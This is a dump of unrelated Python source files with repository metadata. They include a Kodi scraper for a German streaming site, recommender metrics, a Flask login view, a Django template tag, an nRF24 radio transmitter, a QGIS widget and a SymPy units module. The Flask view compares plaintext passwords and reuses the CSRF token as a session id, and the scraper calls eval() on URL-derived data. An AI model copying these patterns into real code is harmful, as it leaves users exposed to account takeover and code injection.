# ..#######.########.#######.##....#..######..######.########....###...########.#######.########..######.
# .##.....#.##.....#.##......###...#.##....#.##....#.##.....#...##.##..##.....#.##......##.....#.##....##
# .##.....#.##.....#.##......####..#.##......##......##.....#..##...##.##.....#.##......##.....#.##......
# .##.....#.########.######..##.##.#..######.##......########.##.....#.########.######..########..######.
# .##.....#.##.......##......##..###.......#.##......##...##..########.##.......##......##...##........##
# .##.....#.##.......##......##...##.##....#.##....#.##....##.##.....#.##.......##......##....##.##....##
# ..#######.##.......#######.##....#..######..######.##.....#.##.....#.##.......#######.##.....#..######.
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @Daddy_Blamo wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Placenta
# Addon id: plugin.video.placenta
# Addon Provider: Mr.Blamo
import base64
import json
import re
import urllib
import urlparse
from openscrapers.modules import cleantitle
from openscrapers.modules import client
from openscrapers.modules import directstream
from openscrapers.modules import dom_parser
from openscrapers.modules import source_utils
class source:
def __init__(self):
self.priority = 1
self.language = ['de']
self.domains = ['tata.to']
self.base_link = 'http://tata.to'
self.search_link = '/filme?suche=%s&type=alle'
self.ajax_link = '/ajax/stream/%s'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = self.__search_movie(imdb, year)
return url if url else None
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'localtvshowtitle': localtvshowtitle,
'aliases': aliases, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if not url:
return
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
tvshowtitle = data['tvshowtitle']
localtvshowtitle = data['localtvshowtitle']
aliases = source_utils.aliases_to_array(eval(data['aliases']))
year = re.findall('(\d{4})', premiered)
year = year[0] if year else data['year']
url = self.__search([localtvshowtitle] + aliases, year, season, episode)
if not url and tvshowtitle != localtvshowtitle:
url = self.__search([tvshowtitle] + aliases, year, season, episode)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
sources = []
try:
if not url:
return sources
ref = urlparse.urljoin(self.base_link, url)
url = urlparse.urljoin(self.base_link, self.ajax_link % re.findall('-(\w+)$', ref)[0])
headers = {'Referer': ref, 'User-Agent': client.randomagent()}
result = client.request(url, headers=headers, post='')
result = base64.decodestring(result)
result = json.loads(result).get('playinfo', [])
if isinstance(result, basestring):
result = result.replace('embed.html', 'index.m3u8')
base_url = re.sub('index\.m3u8\?token=[\w\-]+[^/$]*', '', result)
r = client.request(result, headers=headers)
r = [(i[0], i[1]) for i in
re.findall('#EXT-X-STREAM-INF:.*?RESOLUTION=\d+x(\d+)[^\n]+\n([^\n]+)', r, re.DOTALL) if i]
r = [(source_utils.label_to_quality(i[0]), i[1] + source_utils.append_headers(headers)) for i in r]
r = [{'quality': i[0], 'url': base_url + i[1]} for i in r]
for i in r: sources.append(
{'source': 'CDN', 'quality': i['quality'], 'language': 'de', 'url': i['url'], 'direct': True,
'debridonly': False})
elif result:
result = [i.get('link_mp4') for i in result]
result = [i for i in result if i]
for i in result:
try:
sources.append(
{'source': 'gvideo', 'quality': directstream.googletag(i)[0]['quality'], 'language': 'de',
'url': i, 'direct': True, 'debridonly': False})
except:
pass
return sources
except:
return
def resolve(self, url):
return url
def __search_movie(self, imdb, year):
try:
query = urlparse.urljoin(self.base_link, self.search_link % imdb)
y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
r = client.request(query)
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'container'})
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'ml-item-content'})
r = [(dom_parser.parse_dom(i, 'a', attrs={'class': 'ml-image'}, req='href'),
dom_parser.parse_dom(i, 'ul', attrs={'class': 'item-params'})) for i in r]
r = [(i[0][0].attrs['href'], re.findall('calendar.+?>.+?(\d{4})', ''.join([x.content for x in i[1]]))) for i
in r if i[0] and i[1]]
r = [(i[0], i[1][0] if len(i[1]) > 0 else '0') for i in r]
r = sorted(r, key=lambda i: int(i[1]), reverse=True) # with year > no year
r = [i[0] for i in r if i[1] in y][0]
return source_utils.strip_domain(r)
except:
return
def __search(self, titles, year, season=0, episode=False):
try:
query = self.search_link % (urllib.quote_plus(cleantitle.query(titles[0])))
query = urlparse.urljoin(self.base_link, query)
t = [cleantitle.get(i) for i in set(titles) if i]
y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
r = client.request(query)
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'container'})
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'ml-item-content'})
f = []
for i in r:
_url = dom_parser.parse_dom(i, 'a', attrs={'class': 'ml-image'}, req='href')[0].attrs['href']
_title = re.sub('<.+?>|</.+?>', '', dom_parser.parse_dom(i, 'h6')[0].content).strip()
try:
_title = re.search('(.*?)\s(?:staf+el|s)\s*(\d+)', _title, re.I).group(1)
except:
pass
_season = '0'
_year = re.findall('calendar.+?>.+?(\d{4})', ''.join(
[x.content for x in dom_parser.parse_dom(i, 'ul', attrs={'class': 'item-params'})]))
_year = _year[0] if len(_year) > 0 else '0'
if season > 0:
s = dom_parser.parse_dom(i, 'span', attrs={'class': 'season-label'})
s = dom_parser.parse_dom(s, 'span', attrs={'class': 'el-num'})
if s: _season = s[0].content.strip()
if cleantitle.get(_title) in t and _year in y and int(_season) == int(season):
f.append((_url, _year))
r = f
r = sorted(r, key=lambda i: int(i[1]), reverse=True) # with year > no year
r = [i[0] for i in r if r[0]][0]
url = source_utils.strip_domain(r)
if episode:
r = client.request(urlparse.urljoin(self.base_link, url))
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'season-list'})
r = dom_parser.parse_dom(r, 'li')
r = dom_parser.parse_dom(r, 'a', req='href')
r = [(i.attrs['href'], i.content) for i in r]
r = [i[0] for i in r if i[1] and int(i[1]) == int(episode)][0]
url = source_utils.strip_domain(r)
return url
except:
return
|
repotvsupertuga/tvsupertuga.repository
|
script.module.openscrapers/lib/openscrapers/sources_openscrapers/de/tata.py
|
Python
|
gpl-2.0
| 8,804
|
import numpy as np
from sklearn.metrics import mean_squared_error as MSE
from sklearn.metrics import auc, roc_curve, roc_auc_score
def AUC(P, X ,testX = None):
score_in = []
score_out = []
for i in range(X.shape[0]):
Y = X[i]
predY = P[i]
try:
score_in.append(roc_auc_score(Y, predY))
except:
pass
Y = testX[i]
if testX is not None:
try:
score_out.append(roc_auc_score(Y, predY))
except:
pass
else:
score_in = [0]
return np.mean(score_in), np.mean(score_out)
def MAP_MRR_atK(k, P, X, testX = None):
MAP = []
MRR = []
for i in range(X.shape[0]):
nnz = [j for j in range(testX.shape[1]) if testX[i, j] != 0]
if len(nnz) > 0:
top = sorted(range(len(P[i])), key = lambda j: P[i, j], reverse = True)
topk = []
for t in top:
if X[i, t] == 0:
topk.append(t)
if len(topk) >= k:
break
ap = 0.0
rr = 0.0
hit = 0.0
#ap
for (cnt, t) in enumerate(topk):
if testX[i, t] == 1:
hit += 1
ap += (hit/(cnt+1))/len(nnz)
#rr
for (cnt, t) in enumerate(topk):
if testX[i, t] == 1:
rr = 1.0/(cnt+1)
break
MAP.append(ap)
MRR.append(rr)
return np.mean(MAP), np.mean(MRR)
def precision_recall_atK(k, P, X, testX = None):
precision = []
recall = []
for i in range(X.shape[0]):
nnz = [j for j in range(testX.shape[1]) if testX[i, j] != 0]
if len(nnz) > 0:
top = sorted(range(len(P[i])), key = lambda j: P[i, j], reverse = True)
topk = []
for t in top:
if X[i, t] == 0:
topk.append(t)
if len(topk) >= k:
break
hit = set(topk) & set(nnz)
p = float(len(hit))/k
r = float(len(hit))/ len(nnz)
precision.append(p)
recall.append(r)
return np.mean(precision), np.mean(recall)
|
b29308188/mslab-recsys
|
src/evals.py
|
Python
|
gpl-2.0
| 2,290
|
import asjson
from flask.views import MethodView
from functools import wraps
from flask.ext.mongoengine.wtf import model_form
from flask import request, render_template, Blueprint, redirect, abort, session, make_response
from .models import User, SessionStorage
from mongoengine import DoesNotExist
auth = Blueprint('auth', __name__, template_folder='templates')
class UserAuth(MethodView):
@staticmethod
def get():
form = model_form(User)(request.form)
return render_template('auth/index.html', form=form)
@staticmethod
def post():
if request.form:
try:
username = request.form['name']
password = request.form['password']
user = User.objects.get(name=username)
if user and user.password == password:
# prepare response/redirect
response = make_response(redirect('/panel_control'))
if 'session' in request.cookies:
session_id = request.cookies['session']
else:
session_id = session['csrf_token']
# Setting user-cookie
response.set_cookie('session_id', value=session_id)
# After.We update our storage session(remove old + add new record)
record = SessionStorage()
record.remove_old_session(username)
record.user = username
record.session_key = session_id
record.save()
# And redirect to admin-panel
return response
else:
raise DoesNotExist
except DoesNotExist:
return abort(401)
@staticmethod
def is_admin():
# Выуживаем куки из различных мест,т.к. отправлять могут в виде атрибута заголовков
cookies = request.cookies
if not cookies: # Ничего не нашли на первой иттерации.Попробуем вытащить из заголовка
try:
cookies = asjson.loads(request.headers['Set-Cookie'])
except KeyError:
pass
if 'session_id' in cookies:
session_id = cookies['session_id']
return bool(SessionStorage.objects.filter(session_key=session_id))
else:
return False
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
if not UserAuth.is_admin():
return redirect('auth')
return f(*args, **kwargs)
return decorated
auth.add_url_rule('/auth/', view_func=UserAuth.as_view('auth'))
|
VeeSot/blog
|
auth/views.py
|
Python
|
gpl-2.0
| 2,792
|
import purchase_requisition
|
3dfxsoftware/cbss-addons
|
purchase_requisition_make_po/__init__.py
|
Python
|
gpl-2.0
| 28
|
import importlib
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from ckeditor_link import conf
from django import template
from django.template.defaultfilters import stringfilter
try:
module_name, class_name = conf.CKEDITOR_LINK_MODEL.rsplit(".", 1)
my_module = importlib.import_module(module_name)
ckeditor_link_class = getattr(my_module, class_name, None)
except ImportError:
ckeditor_link_class = None
register = template.Library()
@register.filter
@stringfilter
def ckeditor_link_add_links(html):
# lxml is not a dependency, but needed for this tag.
from lxml.html import fragment_fromstring, tostring
if not ckeditor_link_class:
# TODO: use some log thing, or rais ImproperlyConfigured!
if settings.DEBUG:
msg = "Warning: CKEDITOR_LINK_MODEL (%s) could not be imported!?" % (conf.CKEDITOR_LINK_MODEL, )
raise ImproperlyConfigured(msg)
return html
fragment = fragment_fromstring("<div>" + html + "</div>")
links = fragment.cssselect('a')
for link in links:
if link.get('data-ckeditor-link', None):
link.attrib.pop('data-ckeditor-link')
kwargs = {}
dummy_link = ckeditor_link_class()
for key, value in link.items():
if key.startswith('data-'):
new_key = key.replace('data-', '', 1)
# DEPRECATED: use CKEDITOR_LINK_ATTR_MODIFIERS setting!
if new_key == 'page_2':
new_key = 'cms_page' # backward compat, for 0.2.0
if new_key == 'cms_page_2':
new_key = 'cms_page'
# until here
if hasattr(dummy_link, new_key):
if hasattr(dummy_link, new_key + "_id"):
# set fk directly
new_key = new_key + "_id"
if not value:
value = None
kwargs[new_key] = value
link.attrib.pop(key)
for key, formatted_string in conf.CKEDITOR_LINK_ATTR_MODIFIERS.items():
try:
kwargs[key] = formatted_string.format(**kwargs)
except KeyError:
# this is an option, we dont know at all how our link is/was built (ages ago)
pass
try:
# this can go wrong with fk and the like
real_link = ckeditor_link_class(**kwargs)
link.set('href', real_link.get_link())
if getattr(real_link, 'get_link_target', None):
link.set('target', real_link.get_link_target())
if getattr(real_link, 'get_link_style', None):
link.set('class', real_link.get_link_style())
if getattr(real_link, 'get_link_attrs', None):
for attr, value in real_link.get_link_attrs().items():
link.set(attr, value)
except (ValueError, ObjectDoesNotExist):
continue
# arf: http://makble.com/python-why-lxml-etree-tostring-method-returns-bytes
# beautifulsoup to the rescue!
return tostring(fragment, encoding='unicode')
|
benzkji/django-ckeditor-link
|
ckeditor_link/templatetags/ckeditor_link_tags.py
|
Python
|
gpl-2.0
| 3,359
|
try:
import RPi.GPIO as GPIO
from lib_nrf24 import NRF24
from math import *
import time
import spidev
import sys
import os.path
import numpy
import pickle
import sqlite3
import mat4py as m4p
import os
def compress(uncompressed):
"""Compress a string to a list of output symbols."""
# Build the dictionary.
dict_size = 256
dictionary = {chr(i): i for i in range(dict_size)}
#dictionary = dict((chr(i), i) for i in xrange(dict_size))
# in Python 3: dictionary = {chr(i): i for i in range(dict_size)}
w = ""
result = []
for c in uncompressed:
wc = w + c
if wc in dictionary:
w = wc
else:
result.append(dictionary[w])
# Add wc to the dictionary.
dictionary[wc] = dict_size
dict_size += 1
w = c
# Output the code for w.
if w:
result.append(dictionary[w])
return result
def printSummary(file1, file2):
"""
printSummary() prints out the number of bytes in the original file and in
the result file.
@params: two files that are to be checked.
@return: n/a.
"""
# Checks if the files exist in the current directory.
if (not os.path.isfile(file1)) or (not os.path.isfile(file2)):
printError(0)
# Finds out how many bytes in each file.
f1_bytes = os.path.getsize(file1)
f2_bytes = os.path.getsize(file2)
sys.stderr.write(str(file1) + ': ' + str(f1_bytes) + ' bytes\n')
sys.stderr.write(str(file2) + ': ' + str(f2_bytes) + ' bytes\n')
def main():
GPIO.setmode(GPIO.BCM)
GPIO.setup(23, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(22, GPIO.OUT, initial=GPIO.LOW)
print("Transmitter")
pipes = [[0xe7, 0xe7, 0xe7, 0xe7, 0xe7], [0xc2, 0xc2, 0xc2, 0xc2, 0xc2]]
payloadSize = 32
channel_TX = 0x40
channel_RX = 0x45
#Initializa the radio transceivers with the CE ping connected to the GPIO22 and GPIO23
radio_Tx = NRF24(GPIO, spidev.SpiDev())
radio_Rx = NRF24(GPIO, spidev.SpiDev())
radio_Tx.begin(0, 22)
radio_Rx.begin(1, 24)
#We set the Payload Size to the limit which is 32 bytes
radio_Tx.setPayloadSize(payloadSize)
radio_Rx.setPayloadSize(payloadSize)
#We choose the channels to be used for one and the other transceiver
radio_Tx.setChannel(channel_TX)
radio_Rx.setChannel(channel_RX)
#We set the Transmission Rate
radio_Tx.setDataRate(NRF24.BR_250KBPS)
radio_Rx.setDataRate(NRF24.BR_250KBPS)
#Configuration of the power level to be used by the transceiver
radio_Tx.setPALevel(NRF24.PA_MIN)
radio_Rx.setPALevel(NRF24.PA_MIN)
#We disable the Auto Acknowledgement
radio_Tx.setAutoAck(False)
radio_Rx.setAutoAck(False)
radio_Tx.enableDynamicPayloads()
radio_Rx.enableDynamicPayloads()
#Open the writing and reading pipe
radio_Tx.openWritingPipe(pipes[1])
radio_Rx.openReadingPipe(0, pipes[0])
#We print the configuration details of both transceivers
print("Transmitter Details #################################################################################")
radio_Tx.printDetails()
print("*---------------------------------------------------------------------------------------------------*")
print("Receiver Details ####################################################################################")
radio_Rx.printDetails()
print("*---------------------------------------------------------------------------------------------------*")
###############################################################################################################################
###############################################################################################################################
###############################################################################################################################
#Read file to transmit
#inFile = open("SampleTextFile1Mb.txt", "rb")
inFile = open("ElQuijote.txt", "rb")
data2Tx = inFile.read()
inFile.close()
#flag variables
original_flag_data = 'A'
flag = ""
flag_n = 0
#packet realted variables
overhead = 1
dataSize = payloadSize - overhead
dataControlSize = payloadSize - overhead
#Data Packets
packets = []
numberofPackets = 0
#ACK related variables
ack = []
handshake = []
ack_received = 0
handshakeAck_received = 0
#Time variables
time_ack = 1
start_c = time.time()
#Compression of the data to transmit into data2Tx_compressed
data2Tx_compressed = compress(data2Tx)
n=len(bin(max(data2Tx_compressed)))-2
#We create the string with the packets needed to decompress the file transmitted
controlList_extended = []
controlList = []
for val in data2Tx_compressed:
division = int(val/256)
controlList.append(division)
if(n > 16):
for val in controlList:
division = int(val/256)
controlList_extended.append(division)
data2Send = []
for iterator in range(0, len(controlList)):
data2Send.append(data2Tx_compressed[iterator])
data2Send.append(controlList[iterator])
if(n > 16):
data2Send.append(controlList_extended[iterator])
final_c = time.time()
print("Compression time: " + str(final_c-start_c))
#Now we conform all the data packets in a list
for i in range (0, len(data2Send), dataSize):
if((i+dataSize) < len(data2Send)):
packets.append(data2Send[i:i+dataSize])
else:
packets.append(data2Send[i:])
numberofPackets += 1
#Start time
start = time.time()
radio_Rx.startListening()
radio_Tx.write(str(numberofPackets) + "," + str(n))
timeout = time.time() + time_ack
str_Handshake = ""
#While we don't receive the handshake ack we keep trying
while not (handshakeAck_received):
if radio_Rx.available(0):
radio_Rx.read(handshake, radio_Rx.getDynamicPayloadSize())
print("Something received")
for c in range(0, len(handshake)):
str_Handshake = str_Handshake + chr(handshake[c])
#If the received ACK does not match the expected one we retransmit, else we set the received handshake ack to 1
if(list(str_Handshake) != list("ACK")):
radio_Tx.write(str(numberofPackets) + "," + str(n))
timeout = time.time() + time_ack
print("Handshake Message Lost")
str_Handshake = ""
else:
print("Handshake done")
handshakeAck_received = 1
#If an established time passes and we have not received anything we retransmit the handshake packet
if((time.time() + 0.2) > timeout):
print("No Handshake ACK received resending message")
radio_Tx.write(str(numberofPackets) + "," + str(n))
timeout = time.time() + time_ack
#We iterate over every packet to be sent
dec_ready = 0
for message in packets:
flag = chr(ord(original_flag_data) + flag_n)
message2Send = list(flag) + message
radio_Tx.write(message2Send)
time.sleep(1)
if(dec_ready == 200):
time.sleep(0.3)
dec_ready = 0
timeout = time.time() + time_ack
radio_Rx.startListening()
str_ack = ""
#While we don't receive a correct ack for the transmitted packet we keep trying for the same packet
while not (ack_received):
if radio_Rx.available(0):
radio_Rx.read(ack, radio_Rx.getDynamicPayloadSize())
for c in range(0, len(ack)):
str_ack = str_ack + chr(ack[c])
print(str_ack)
#If the received ACK does not match the expected one we retransmit, else we set the received data ack to 1
if(list(str_ack) != (list("ACK") + list(flag))):
radio_Tx.write(list(flag) + list(message))
timeout = time.time() + time_ack
#print("Data ACK received but not the expected one --> resending message")
str_ack = ""
else:
ack_received = 1
#If an established time passes and we have not received anything we retransmit the data packet
if((time.time() + 0.01) > timeout):
print("No Data ACK received resending message")
radio_Tx.write(message2Send)
timeout = time.time() + time_ack
dec_ready = 0
ack_received = 0
flag_n = (flag_n + 1) % 10
final = time.time()
totalTime = final - start
print(totalTime)
GPIO.output(22, 0)
GPIO.output(23, 0)
if __name__ == '__main__':
main()
except KeyboardInterrupt:
GPIO.output(22,0)
GPIO.output(23,0)
GPIO.output(24,0)
GPIO.cleanup()
|
AdriaGS/MTP-Group-C
|
Single Mode/Semi-Final/deviceTX_wC2.py
|
Python
|
gpl-2.0
| 8,154
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
extentSelector.py
---------------------
Date : December 2010
Copyright : (C) 2010 by Giuseppe Sucameli
Email : brush dot tyler at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Giuseppe Sucameli'
__date__ = 'December 2010'
__copyright__ = '(C) 2010, Giuseppe Sucameli'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from qgis.gui import *
from ui_extentSelector import Ui_GdalToolsExtentSelector as Ui_ExtentSelector
import GdalTools_utils as Utils
class GdalToolsExtentSelector(QWidget, Ui_ExtentSelector):
def __init__(self, parent=None):
QWidget.__init__(self, parent)
self.canvas = None
self.tool = None
self.previousMapTool = None
self.isStarted = False
self.setupUi(self)
self.connect(self.x1CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.x2CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.y1CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.y2CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.btnEnable, SIGNAL("clicked()"), self.start)
def setCanvas(self, canvas):
self.canvas = canvas
self.tool = RectangleMapTool(self.canvas)
self.previousMapTool = self.canvas.mapTool()
self.connect(self.tool, SIGNAL("rectangleCreated()"), self.fillCoords)
self.connect(self.tool, SIGNAL("deactivated()"), self.pause)
def stop(self):
if not self.isStarted:
return
self.isStarted = False
self.btnEnable.setVisible(False)
self.tool.reset()
self.canvas.unsetMapTool(self.tool)
if self.previousMapTool != self.tool:
self.canvas.setMapTool(self.previousMapTool)
#self.coordsChanged()
self.emit( SIGNAL( "selectionStopped()" ) )
def start(self):
prevMapTool = self.canvas.mapTool()
if prevMapTool != self.tool:
self.previousMapTool = prevMapTool
self.canvas.setMapTool(self.tool)
self.isStarted = True
self.btnEnable.setVisible(False)
self.coordsChanged()
self.emit( SIGNAL( "selectionStarted()" ) )
def pause(self):
if not self.isStarted:
return
self.btnEnable.setVisible(True)
self.emit( SIGNAL( "selectionPaused()" ) )
def setExtent(self, rect):
if self.tool.setRectangle(rect):
self.emit( SIGNAL( "newExtentDefined()" ) )
def getExtent(self):
return self.tool.rectangle()
def isCoordsValid(self):
try:
point1 = QgsPoint( float(self.x1CoordEdit.text()), float(self.y1CoordEdit.text()) )
point2 = QgsPoint( float(self.x2CoordEdit.text()), float(self.y2CoordEdit.text()) )
except ValueError:
return False
return True
def coordsChanged(self):
rect = None
if self.isCoordsValid():
point1 = QgsPoint( float(self.x1CoordEdit.text()), float(self.y1CoordEdit.text()) )
point2 = QgsPoint( float(self.x2CoordEdit.text()), float(self.y2CoordEdit.text()) )
rect = QgsRectangle(point1, point2)
self.setExtent(rect)
def fillCoords(self):
rect = self.getExtent()
self.blockSignals(True)
if rect != None:
self.x1CoordEdit.setText( str(rect.xMinimum()) )
self.x2CoordEdit.setText( str(rect.xMaximum()) )
self.y1CoordEdit.setText( str(rect.yMaximum()) )
self.y2CoordEdit.setText( str(rect.yMinimum()) )
else:
self.x1CoordEdit.clear()
self.x2CoordEdit.clear()
self.y1CoordEdit.clear()
self.y2CoordEdit.clear()
self.blockSignals(False)
self.emit( SIGNAL( "newExtentDefined()" ) )
class RectangleMapTool(QgsMapToolEmitPoint):
def __init__(self, canvas):
self.canvas = canvas
QgsMapToolEmitPoint.__init__(self, self.canvas)
self.rubberBand = QgsRubberBand( self.canvas, True ) # true, its a polygon
self.rubberBand.setColor( Qt.red )
self.rubberBand.setWidth( 1 )
self.reset()
def reset(self):
self.startPoint = self.endPoint = None
self.isEmittingPoint = False
self.rubberBand.reset( True ) # true, its a polygon
def canvasPressEvent(self, e):
self.startPoint = self.toMapCoordinates( e.pos() )
self.endPoint = self.startPoint
self.isEmittingPoint = True
self.showRect(self.startPoint, self.endPoint)
def canvasReleaseEvent(self, e):
self.isEmittingPoint = False
if self.rectangle() != None:
self.emit( SIGNAL("rectangleCreated()") )
def canvasMoveEvent(self, e):
if not self.isEmittingPoint:
return
self.endPoint = self.toMapCoordinates( e.pos() )
self.showRect(self.startPoint, self.endPoint)
def showRect(self, startPoint, endPoint):
self.rubberBand.reset( True ) # true, it's a polygon
if startPoint.x() == endPoint.x() or startPoint.y() == endPoint.y():
return
point1 = QgsPoint(startPoint.x(), startPoint.y())
point2 = QgsPoint(startPoint.x(), endPoint.y())
point3 = QgsPoint(endPoint.x(), endPoint.y())
point4 = QgsPoint(endPoint.x(), startPoint.y())
self.rubberBand.addPoint( point1, False )
self.rubberBand.addPoint( point2, False )
self.rubberBand.addPoint( point3, False )
self.rubberBand.addPoint( point4, True ) # true to update canvas
self.rubberBand.show()
def rectangle(self):
if self.startPoint == None or self.endPoint == None:
return None
elif self.startPoint.x() == self.endPoint.x() or self.startPoint.y() == self.endPoint.y():
return None
return QgsRectangle(self.startPoint, self.endPoint)
def setRectangle(self, rect):
if rect == self.rectangle():
return False
if rect == None:
self.reset()
else:
self.startPoint = QgsPoint(rect.xMaximum(), rect.yMaximum())
self.endPoint = QgsPoint(rect.xMinimum(), rect.yMinimum())
self.showRect(self.startPoint, self.endPoint)
return True
def deactivate(self):
QgsMapTool.deactivate(self)
self.emit(SIGNAL("deactivated()"))
|
bstroebl/QGIS
|
python/plugins/GdalTools/tools/extentSelector.py
|
Python
|
gpl-2.0
| 7,022
|
# -*- coding: utf-8 -*-
"""
Several methods to simplify expressions involving unit objects.
"""
from __future__ import division
from sympy.utilities.exceptions import SymPyDeprecationWarning
from sympy import Add, Function, Mul, Pow, Rational, Tuple, sympify
from sympy.core.compatibility import reduce, Iterable
from sympy.physics.units.dimensions import Dimension, dimsys_default
from sympy.physics.units.quantities import Quantity
from sympy.physics.units.prefixes import Prefix
from sympy.utilities.iterables import sift
def dim_simplify(expr):
"""
NOTE: this function could be deprecated in the future.
Simplify expression by recursively evaluating the dimension arguments.
This function proceeds to a very rough dimensional analysis. It tries to
simplify expression with dimensions, and it deletes all what multiplies a
dimension without being a dimension. This is necessary to avoid strange
behavior when Add(L, L) be transformed into Mul(2, L).
"""
SymPyDeprecationWarning(
deprecated_since_version="1.2",
feature="dimensional simplification function",
issue=13336,
useinstead="don't use",
).warn()
_, expr = Quantity._collect_factor_and_dimension(expr)
return expr
def _get_conversion_matrix_for_expr(expr, target_units):
from sympy import Matrix
expr_dim = Dimension(Quantity.get_dimensional_expr(expr))
dim_dependencies = dimsys_default.get_dimensional_dependencies(expr_dim, mark_dimensionless=True)
target_dims = [Dimension(Quantity.get_dimensional_expr(x)) for x in target_units]
canon_dim_units = {i for x in target_dims for i in dimsys_default.get_dimensional_dependencies(x, mark_dimensionless=True)}
canon_expr_units = {i for i in dim_dependencies}
if not canon_expr_units.issubset(canon_dim_units):
return None
canon_dim_units = sorted(canon_dim_units)
camat = Matrix([[dimsys_default.get_dimensional_dependencies(i, mark_dimensionless=True).get(j, 0) for i in target_dims] for j in canon_dim_units])
exprmat = Matrix([dim_dependencies.get(k, 0) for k in canon_dim_units])
res_exponents = camat.solve_least_squares(exprmat, method=None)
return res_exponents
def convert_to(expr, target_units):
"""
Convert ``expr`` to the same expression with all of its units and quantities
represented as factors of ``target_units``, whenever the dimension is compatible.
``target_units`` may be a single unit/quantity, or a collection of
units/quantities.
Examples
========
>>> from sympy.physics.units import speed_of_light, meter, gram, second, day
>>> from sympy.physics.units import mile, newton, kilogram, atomic_mass_constant
>>> from sympy.physics.units import kilometer, centimeter
>>> from sympy.physics.units import convert_to
>>> convert_to(mile, kilometer)
25146*kilometer/15625
>>> convert_to(mile, kilometer).n()
1.609344*kilometer
>>> convert_to(speed_of_light, meter/second)
299792458*meter/second
>>> convert_to(day, second)
86400*second
>>> 3*newton
3*newton
>>> convert_to(3*newton, kilogram*meter/second**2)
3*kilogram*meter/second**2
>>> convert_to(atomic_mass_constant, gram)
1.66053904e-24*gram
Conversion to multiple units:
>>> convert_to(speed_of_light, [meter, second])
299792458*meter/second
>>> convert_to(3*newton, [centimeter, gram, second])
300000*centimeter*gram/second**2
Conversion to Planck units:
>>> from sympy.physics.units import gravitational_constant, hbar
>>> convert_to(atomic_mass_constant, [gravitational_constant, speed_of_light, hbar]).n()
7.62950196312651e-20*gravitational_constant**(-0.5)*hbar**0.5*speed_of_light**0.5
"""
if not isinstance(target_units, (Iterable, Tuple)):
target_units = [target_units]
if isinstance(expr, Add):
return Add.fromiter(convert_to(i, target_units) for i in expr.args)
expr = sympify(expr)
if not isinstance(expr, Quantity) and expr.has(Quantity):
expr = expr.replace(lambda x: isinstance(x, Quantity), lambda x: x.convert_to(target_units))
def get_total_scale_factor(expr):
if isinstance(expr, Mul):
return reduce(lambda x, y: x * y, [get_total_scale_factor(i) for i in expr.args])
elif isinstance(expr, Pow):
return get_total_scale_factor(expr.base) ** expr.exp
elif isinstance(expr, Quantity):
return expr.scale_factor
return expr
depmat = _get_conversion_matrix_for_expr(expr, target_units)
if depmat is None:
return expr
expr_scale_factor = get_total_scale_factor(expr)
return expr_scale_factor * Mul.fromiter((1/get_total_scale_factor(u) * u) ** p for u, p in zip(target_units, depmat))
def quantity_simplify(expr):
if expr.is_Atom:
return expr
if not expr.is_Mul:
return expr.func(*map(quantity_simplify, expr.args))
if expr.has(Prefix):
coeff, args = expr.as_coeff_mul(Prefix)
args = list(args)
for arg in args:
if isinstance(arg, Pow):
coeff = coeff * (arg.base.scale_factor ** arg.exp)
else:
coeff = coeff * arg.scale_factor
expr = coeff
coeff, args = expr.as_coeff_mul(Quantity)
args_pow = [arg.as_base_exp() for arg in args]
quantity_pow, other_pow = sift(args_pow, lambda x: isinstance(x[0], Quantity), binary=True)
quantity_pow_by_dim = sift(quantity_pow, lambda x: x[0].dimension)
# Just pick the first quantity:
ref_quantities = [i[0][0] for i in quantity_pow_by_dim.values()]
new_quantities = [
Mul.fromiter(
(quantity*i.scale_factor/quantity.scale_factor)**p for i, p in v)
if len(v) > 1 else v[0][0]**v[0][1]
for quantity, (k, v) in zip(ref_quantities, quantity_pow_by_dim.items())]
return coeff*Mul.fromiter(other_pow)*Mul.fromiter(new_quantities)
|
wxgeo/geophar
|
wxgeometrie/sympy/physics/units/util.py
|
Python
|
gpl-2.0
| 5,989
|
# Copyright 2015, Nashwan Azhari.
# Licensed under the GPLv2, see LICENSE file for details.
"""
A pure Python implementation of the functionality of the ConvertTo-SecureString
and ConvertFrom-SecureString PoweShell commandlets.
Usage example:
from securestring import encrypt, decrypt
if __name__ == "__main__":
str = "My horse is amazing"
# encryption:
try:
enc = encrypt(str)
print("The encryption of %s is: %s" % (str, enc))
except Exception as e:
print(e)
# decryption:
try:
dec = decrypt(enc)
print("The decryption of the above is: %s" % dec)
except Exception as e:
print(e)
# checking of operation symmetry:
print("Encryption and decryption are symmetrical: %r", dec == str)
